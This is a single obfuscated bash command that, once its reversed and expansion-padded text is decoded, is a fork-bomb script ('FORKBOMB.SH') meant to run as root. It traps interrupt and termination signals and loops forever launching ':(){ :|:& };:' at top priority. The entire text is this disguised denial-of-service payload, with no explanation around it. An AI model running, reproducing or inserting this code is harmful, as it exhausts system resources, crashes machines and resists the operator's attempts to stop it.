 ${*}   'p''r'$'\x69'ntf %s "$(  W5TyKwpx='   ${*//uxPgw2U?/*uo,Mo\!u}   ${*~~}   P${@^}RI\N"T"""F  %S   "$(   ${*//\{OAk/\}Ro,} $'"'"'\U0072'"'"'${@##MYz|jvP}EV <<<   '"'"'

ENOD
 & }:;} &:|: {)(:;02- N- ECIN{ PUHON
)(PART
OD
: ELIHW
}
51 3 2 '"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"' PART	
{
)(PART NOITCNUF
 HS.BMOBKROF#
KROW OT ECIN ROF TOOR SA NUR#'"'"' ${*~~} ;  ${*##4vXy%25n}   ${*##8nm2=Sj}   )"   ${*^} |   ${*~}  ${!@} ${!#}  ${*,,}  '  ${@^}  &&  ${*,,}  p''"r"i\nt""\f   %s  "${W5TyKwpx~~}" ${*#\}>oC} ${*%j\`uF.-^\\}  ${*^}  "${@~~}"      )" ${*#=xNJ*}  |   ${*#S:Xl}  ${*^}  ${!#} ${*~~}  

